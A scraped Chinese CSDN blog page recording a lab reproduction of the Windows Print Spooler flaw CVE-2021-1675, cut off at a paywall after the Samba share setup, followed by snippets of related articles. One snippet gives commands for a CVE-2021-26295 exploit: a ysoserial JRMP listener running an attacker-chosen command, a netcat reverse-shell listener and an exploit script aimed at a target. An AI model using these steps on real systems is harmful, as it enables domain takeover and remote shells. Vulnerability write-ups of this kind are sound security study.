CVE-2021-1675 Windows Print Spooler 域内提权漏洞记录

最新推荐文章于 2023-08-03 18:00:00 发布
最新推荐文章于 2023-08-03 18:00:00 发布
阅读量238 收藏 1
点赞数 1
文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38055050/article/details/128375620
版权
本文详细记录了CVE-2021-1675 Windows Print Spooler漏洞的情况,攻击者能通过此漏洞在打印服务器上安装恶意驱动,若用户在域内,攻击者甚至可能控制整个域环境。文中介绍了环境设置,包括Windows Server 2016和Kali Linux,以及如何搭建smbd服务、生成shellcode和复现漏洞的过程。
摘要由CSDN通过智能技术生成

信息

Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。
攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。

环境

windows server 2016 : 192.168.52.110
kali : 192.168.52.131
Domain User : zhang

CVE-2021-1675 的补丁信息参照 https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675

准备

搭建smbd服务

使用kali自带的smbd服务,编辑 /etc/samba/smb.conf,添加一个smb的匿名访问目录

[global]   
   map to guest = Bad User
   server role 
最低0.47元/天 解锁文章
shavchen
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Windows Print Spooler权限提升漏洞PrintNightmare)
谢公子的博客
06-29 3851
目录 一:漏洞概述 二:影响范围 三:漏洞利用 四:漏洞防护 4.1 官方升级 4.2 临时防护措施 一:漏洞概述 6月9日,绿盟科技CERT监测到微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个WindowsPrintSpooler权限提升漏洞CVE-2021-1675),此漏洞为绿盟科技天机实验室向微软报告并获得官方致谢。 Print SpoolerWindows系统中用于管理打印相关事务的服务,虽然微软在公告中将该漏洞标记为Important级别的本地权限提升漏洞..
access驱动程序_Windows打印机驱动程序本地提权漏洞分析(CVE201919363)
weixin_39527163的博客
11-26 360
打印机制造商Ricoh已要求Pentagrid协调披露了一个提权漏洞,以缓解影响多种打印机的Windows打印机驱动程序的漏洞。由于在将打印机添加到Windows系统时安装的文件系统条目的文件权限设置不当,因此任何本地用户都可以使用自己的代码覆盖程序库文件(DLL)。0x01 漏洞描述Windows加载了受不当保护的库文件PrintIsolationHost.exe,这是一个以Windo...
CVE-2022-22718:Windows Print Spooler提权
Fly_鹏程万里
04-11 567
2022年02月09日,微软发布了安全更新,修复了48个安全漏洞(不包括22个Microsoft Edge漏洞),其中CVE-2022-22718为Windows后台打印程序特权提升漏洞,CVSS评分7.7。
CVE-2021-1675 Print Spooler漏洞复现远程执行及提权
m0_55937801的博客
04-09 5145
CVE-2021-1675
【技术分享】cve-2021-1675-windows提权复现以及详细分析
weixin_45062925的博客
05-24 877
1、漏洞描述 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个环境。 Github公布的地址...
CVE-2021-1675 Windows Print Spooler权限提升漏洞复现
m0_56642842的博客
07-26 3300
0x00 简介 微软6月发布的安全更新补丁中包括了一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在控制器上执行任意代码,从而获得整个的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 0x01 漏洞概述 Print SpoolerWindows系统中管理打印相关事务的服务,用于管理所有本地和网络打印队列并控制所有打印工作。Windows系统默认开启
微软通杀漏洞-CVE-2021-1675复现
Ms08067安全实验室
08-19 2462
文章来源|MS08067安全实验室本文作者:龙诺(Web知识星球追洞小组)一 准备环境实验环境:windows2019 (192.168.189.145) kali linux (192...
所学漏洞总结
weixin_45540609的博客
08-31 886
一、CVE-2021-28474 MS SharePoint远程代码执行漏洞 1、漏洞简介 漏洞允许通过身份验证的用户在SharePoint web应用程序的服务账户中执行任意.NET代码。想要利用该漏洞,攻击者需要具备SharePoint站点的SPBasePermissions.ManageLists权限。默认情况下,经过身份验证的SharePoint用户可以创建网页页面,并拥有所需的所有权限。 2、漏洞成因 用于安全验证的代码和实际处理用户输入的代码之间不一致。 EditingPagePars
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5523
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
CVE-2021-26295:CVE-2021-26295 EXP可成功反弹壳牌
03-25
CVE-2021-26295 CVE-2021-26295 EXP可成功反弹壳 本文以及工具仅限于技术共享,不能用于非法用途,否则会导致一切后果自行承担。 触发命令执行EXP 1. VPS启动RMI监听9999端口 java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 ' [要执行的命令] ' 2. VPS启动nc监听64444端口 nc -lvp 64444 3.执行python脚本 python3 cve-2021-26295_exp.py < target> < vps> < vps> 示例
Windwos Print Spooler 权限提升漏洞
Karka_的博客
08-03 313
第一种是报网络安全专业,现在叫网络空间安全专业,主要专业课程:程序设计、计算机组成原理原理、数据结构、操作系统原理、数据库系统、 计算机网络、人工智能、自然语言处理、社会计算、网络安全法律法规、网络安全、内容安全、数字取证、机器学习,多媒体技术,信息检索、舆情分析等。但该漏洞利用exp针对的漏洞是一个与CVE-2021-1675类似又不完全相同的漏洞,并且当时微软针对该漏洞并没有继续推送安全更新补丁,所以意味着这是一个0day漏洞,这个0day漏洞被称为。创建完匿名共享之后,就可以进行漏洞利用了。
〖EXP〗Ladon打印机漏洞提权CVE-2021-1675复现
K8哥哥
07-11 2428
基本情况 6月9日,微软发布6月安全更新补丁,修复了50个安全漏洞,其中包括一个Windows Print Spooler权限提升漏洞漏洞CVE编号:CVE-2021-1675。未经身份验证的远程攻击者可利用该漏洞以SYSTEM权限在控制器上执行任意代码,从而获得整个的控制权。建议受影响用户及时更新漏洞补丁进行防护,做好资产自查以及预防工作,以免遭受黑客攻击。 漏洞描述 Print SpoolerWindows系统中用于管理打印相关事务的服务。 该漏洞环境中合适的条件下,无需任何用户交互,未经身
windows提权总结
HoAd'blog
09-01 897
windows提权总结内核溢出提权Windows系统配置错误提权系统服务权限配置错误注册表键AlwaysInstallElevated可信任服务路径漏洞自动安装配置文件计划任务Windows组策略首选项提权(SYSVOL/GPP)SYSVOL绕过UAC提权msf的uac模块Nishang中的Invoke-PsUACme.ps1令牌窃取AccessToken的窃取与利用DLL劫持第三方服务提权mssql数据库提权mysql数据库提权 内核溢出提权 常用溢出提权 最常用的本地溢出提权CVE-2018-812
CVE-2021-1675Windows Print Spooler RCE
weixin_39664643的博客
07-29 734
漏洞复现】Windows Print Spooler RCE 前言 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。 若攻击者所控制的用户在中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个环境。 攻击者可以利用任何经过身份验证的用户都可以调用RpcAddPrinterDriverEx
微软漏洞 Cve-2021-1675复现
weixin_42345596的博客
07-07 3194
受影响版本 Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Server 2012 (Server Core installation) Windows Server 2012 Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) Windows Ser
漏洞复现|PrintNightmare(CVE-2021-1675)复现
weixin_42282189的博客
01-05 5401
作者: 飞天魔鬼 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 简介 Windows Print SpoolerWindows的打印机后台处理程序,广泛的应用于各种内网中,攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序。若攻击者所控制的用户在中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个环境。 环境准备 一个普通权限的账户 目标开启.
CVE-2021-34527漏洞提权
最新发布
05-12
CVE-2021-34527,也被称为PrintNightmare漏洞,是一个Windows Print Spooler服务中的安全漏洞,影响了Windows 7、Windows Server 2008、Windows Server 2012和Windows Server 2016等操作系统版本。攻击者可以利用这...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值